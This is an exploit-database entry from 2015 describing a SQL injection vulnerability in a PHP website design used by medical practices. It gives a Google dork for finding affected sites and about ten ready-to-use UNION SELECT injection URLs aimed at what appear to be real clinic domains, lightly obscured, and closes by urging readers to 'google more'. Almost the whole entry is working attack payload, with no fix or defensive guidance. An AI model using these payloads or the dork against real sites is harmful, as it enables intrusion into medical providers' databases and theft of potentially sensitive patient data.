Medical Website Design SQL Injection Vulnerability

2015-07-26T00:00:00
ID 1337DAY-ID-23932
Type zdt
Reporter Ashiyane
Modified 2015-07-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Medical Website Design SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.medicalpracticewebsitedesign.com/
# Google Dork : "Medical Practice Website Design" inurl:.php?newsid=
# Date: 2015-07-24
# Tested On : Win 7 / Mozilla Firefox
#
######################
#
# demos and explanations :
#
# http://www.georgXiavascularclinic.com/news-topic.php?newsid=-25%20%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.arundXelpediatrics.net/news-topic.php?newsid=-28%20%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.monXtgomerywomenshealth.com/news-topic.php?newsid=-25%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.ovieXdointernalmedicine.com/news-topic.php?newsid=-29%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://personalizXedcardiology.com/news-topic.php?newsid=-27%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.norXthatlantaprimarycare.com/news-topic.php?newsid=-84%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.medXassocga.com/news-topic.php?newsid=-31%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.sd-Xneurosurgeon.com/news-topic.php?newsid=-16%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.sspXinst.us/news-topic.php?newsid=-25%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.nmmeXdicalgroup.com/news-topic.php?newsid=-13%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
#
# and google more
#
######################
# discovered by : Naji
######################

#  0day.today [2018-01-01]  #